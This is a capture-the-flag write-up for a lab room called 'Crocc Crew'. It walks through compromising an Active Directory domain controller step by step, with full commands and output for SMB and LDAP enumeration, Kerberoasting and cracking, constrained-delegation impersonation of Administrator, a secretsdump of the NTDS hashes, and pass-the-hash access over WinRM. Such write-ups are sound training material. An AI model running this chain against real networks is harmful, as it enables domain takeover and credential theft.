Crocc Crew — Hack Back

This room simulates a scenario where an attacker group called "Crocc Crew" has already placed a backdoor on a Cooctus Corp Domain Controller. Starting from a segmented network position with only the DC visible, we must trace the attackers' footsteps, discover their credentials, and ultimately compromise the domain to find all the flags they left behind. The challenge teaches a complete Active Directory attack chain from enumeration through Kerberoasting to constrained delegation abuse and full domain compromise.

Starting with a full port scan using RustScan piped into Nmap for service detection and script scanning. The target at 10.10.175.192 reveals a classic Windows Domain Controller fingerprint with DNS, Kerberos, LDAP, SMB, and RPC services all exposed.

rustscan -a 10.10.175.192 --ulimit 5500 -b 65535 -- -A -Pn

The scan reveals 17 open ports confirming this is a Domain Controller for the COOCTUS.CORP domain. Key services identified include DNS (53), IIS HTTP (80), Kerberos (88), MSRPC (135), NetBIOS (139), LDAP (389/3268), SMB (445), and WinRM (5985 implied). The RDP NTLM info leak confirms the hostname is DC in the COOCTUS domain with Windows Server 2019 (Build 17763).

The IIS web server on port 80 hosts a page with a terminal emulator featuring the Crocc Crew branding. The crucial discovery comes from checking robots.txt, which reveals two hidden paths that the attackers left behind.

User-Agent: *
Disallow:
/robots.txt
/db-config.bak
/backdoor.php

The /db-config.bak file contains a PHP database configuration backup with hardcoded credentials. This is a critical find that reveals database connection details the Crocc Crew likely used during their initial compromise.

<?php
$servername = "db.cooctus.corp";
$username = "C00ctusAdm1n";
$password = "B4dt0th3b0n3";

$conn = new mysqli($servername, $username, $password);
// Check connection
if ($conn->connect_error) {
    die("Connection Failed: " . $conn->connect_error);
}
echo "Connected Successfully";
?>

The main page also contains a JavaScript terminal emulator with the Crocc Crew greeting "CroccCrew >:)", confirming this is their backdoor. The /backdoor.php endpoint likely serves as their command interface, though direct access doesn't reveal much without the proper authentication or parameters.

Anonymous RPC access is denied (NT_STATUS_ACCESS_DENIED), but we can enumerate privilege information. The real breakthrough comes from SMB access using the Visitor account. Testing various common guest passwords eventually yields access with Visitor:GuestLogin!.

smbclient -L //10.10.175.192 -U "Visitor"

The share listing reveals several interesting shares including Home, ADMIN$, C$, NETLOGON, and SYSVOL. Connecting to the Home share immediately yields our first flag.

smbclient //10.10.175.192/Home -U "Visitor"
# ls
#   user.txt    A    17
# more user.txt
# userflag

Exploring the SYSVOL share as the Visitor user reveals the standard AD Group Policy structure with Policies and scripts directories. While the scripts folder is empty, this confirms standard AD domain configuration with potential GPO attack vectors for later escalation.

Anonymous LDAP queries fail with "Operations error" requiring authentication. However, using the Visitor credentials we can perform a full LDAP bind and enumerate the domain. The first step is identifying the naming contexts, then dumping the full directory.

ldapsearch -x -s base namingcontexts -H ldap://10.10.175.192
# namingcontexts: DC=COOCTUS,DC=CORP
# namingcontexts: CN=Configuration,DC=COOCTUS,DC=CORP
# namingcontexts: CN=Schema,CN=Configuration,DC=COOCTUS,CORP

ldapsearch -x -b "DC=COOCTUS,DC=CORP" \
  -D "COOCTUS\Visitor" -H ldap://10.10.175.192 \
  -W > ldap_crocccrew.txt

The LDAP dump reveals critical information about the domain. Most importantly, it exposes a service account named password-reset with constrained delegation configured. The msDS-AllowedToDelegateTo attribute shows this account can delegate to multiple SPNs under the oakley service type.

sAMAccountName: password-reset
servicePrincipalName: HTTP/dc.cooctus.corp
msDS-AllowedToDelegateTo: oakley/DC.COOCTUS.CORP/COOCTUS.CORP
msDS-AllowedToDelegateTo: oakley/DC.COOCTUS.CORP
msDS-AllowedToDelegateTo: oakley/DC
msDS-AllowedToDelegateTo: oakley/DC.COOCTUS.CORP/COOCTUS
msDS-AllowedToDelegateTo: oakley/DC/COOCTUS

Using ldapdomaindump provides a more structured view of all domain users and groups. The dump reveals approximately 17 domain user accounts including admCroccCrew (a likely attacker-created admin account), standard employee names, and the critical password-reset service account with delegation rights.

ldapdomaindump 10.10.175.192 -u "COOCTUS\Visitor" -p 'GuestLogin!'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

With the Visitor account's credentials, we can request service tickets for accounts with registered SPNs. The GetUserSPNs tool from Impacket automates this by requesting a TGS ticket for the password-reset account and extracting the encrypted portion for offline cracking.

impacket-GetUserSPNs COOCTUS.CORP/Visitor:GuestLogin! \
  -request -dc-ip 10.10.175.192

ServicePrincipalName  Name            MemberOf  Delegation
--------------------  --------------  --------  -----------
HTTP/dc.cooctus.corp  password-reset            constrained

The output confirms the password-reset account has constrained delegation and provides the TGS hash. We save this hash to a file and crack it using John the Ripper with the rockyou wordlist. The password is recovered almost instantly.

john --wordlist=/usr/share/wordlists/rockyou.txt hash_crocc

resetpassword    (?)
1g 0:00:00:00 DONE

The password for the password-reset account is resetpassword — a delightfully ironic choice given the account's name. With these credentials in hand, we now have access to a service account configured with constrained delegation, which is our escalation path to domain admin.

Before exploiting the delegation, we first confirm the exact delegation configuration using Impacket's findDelegation tool. This reveals the full scope of what the password-reset account is trusted to delegate to, and critically, whether protocol transition is enabled.

impacket-findDelegation COOCTUS.CORP/password-reset:resetpassword \
  -dc-ip 10.10.175.192

AccountName      DelegationType                      DelegationRightsTo
--------------   ----------------------------------  -------------------
password-reset   Constrained w/ Protocol Transition  oakley/DC.COOCTUS.CORP/COOCTUS.CORP
password-reset   Constrained w/ Protocol Transition  oakley/DC.COOCTUS.CORP
password-reset   Constrained w/ Protocol Transition  oakley/DC
password-reset   Constrained w/ Protocol Transition  oakley/DC.COOCTUS.CORP/COOCTUS
password-reset   Constrained w/ Protocol Transition  oakley/DC/COOCTUS

The key phrase here is "Constrained w/ Protocol Transition". This means the account can use S4U2Self to get a forwardable TGS for itself on behalf of any user, then use S4U2Proxy to exchange that for a service ticket to the delegated SPN — all without knowing the impersonated user's password. We exploit this by requesting a ticket for the Administrator account.

impacket-getST -spn oakley/DC.COOCTUS.CORP \
  -impersonate Administrator \
  "COOCTUS.CORP/password-reset:resetpassword" \
  -dc-ip 10.10.175.192

[*] Getting TGT for user
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

The attack succeeds and produces an Administrator.ccache file containing a Kerberos service ticket that authenticates as the Domain Administrator. We set the KRB5CCNAME environment variable to point to this cache file, ensuring all subsequent Kerberos tools use the impersonated ticket.

# Add DC to hosts file for Kerberos resolution
echo "10.10.175.192   DC.COOCTUS.CORP" >> /etc/hosts

# Load the ticket into memory
export KRB5CCNAME=Administrator.ccache

# Verify ticket
klist
# Default principal: Administrator@COOCTUS.CORP
# Service: oakley/DC/COOCTUS@COOCTUS.CORP

With the Administrator's Kerberos ticket cached, we can use Impacket's secretsdump.py to remotely extract all credential material from the Domain Controller. This includes the local SAM database, LSA secrets, and the full NTDS.DIT domain password database.

secretsdump.py -k -no-pass DC.COOCTUS.CORP

The dump is comprehensive. From the local SAM we get the local Administrator hash 7dfa0531d73101ca080c7379a9bff1c7, while the NTDS.DIT extraction reveals the domain Administrator hash add41095f1fb0405b32f70a489de022d. All domain user hashes including the Crocc Crew's admCroccCrew account are exposed.

[*] Dumping Domain Credentials (DRSUAPI method)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:add41095f1fb0405b32f70a489de022d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d4609747ddec61b924977ab42538797e:::
COOCTUS.CORP\Visitor:1109:aad3b435b51404eeaad3b435b51404ee:872a35060824b0e61912cb2e9e97bbb1:::
COOCTUS.CORP\admCroccCrew:1121:aad3b435b51404eeaad3b435b51404ee:0e2522b2d7b9fd08190a7f4ece342d8a:::
COOCTUS.CORP\password-reset:1134:aad3b435b51404eeaad3b435b51404ee:0fed9c9dc78da2c6f37f885ee115585c:::

Additionally, the dump extracts Kerberos encryption keys (AES256, AES128, DES) for all accounts, DPAPI backup keys, and the machine account password. This gives us persistent access even if passwords are rotated — the krbtgt hash enables Golden Ticket attacks, and the DPAPI keys can decrypt any user's stored credentials.

Using the Administrator NTLM hash extracted from the secrets dump, we connect to the Domain Controller via WinRM using Evil-WinRM with Pass-the-Hash authentication. No plaintext password is needed — the hash alone is sufficient for full system access.

evil-winrm -u Administrator \
  -H add41095f1fb0405b32f70a489de022d \
  -i 10.10.47.104

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cooctus\administrator

We have a shell as cooctus\administrator on the Domain Controller. Navigating through the file system, we find additional flags left by the Crocc Crew in the shared folders.

cd C:\Shares\Home
ls

# Mode    LastWriteTime    Length Name
# ----    -------------    ------ ----
# d-----  6/8/2021 12:42PM       Home

cd C:\Shares\Home
ls

# -a----  6/8/2021 12:38PM  28  priv-esc-2.txt
# -a----  6/7/2021  8:08PM  22  priv-esc.txt
# -a----  6/7/2021  8:14PM  17  user.txt

The root flag is located in the C:\PerfLogs\Admin directory, a classic hiding spot for CTF challenges since it's a rarely-visited system directory.

cd C:\PerfLogs\Admin
type root.txt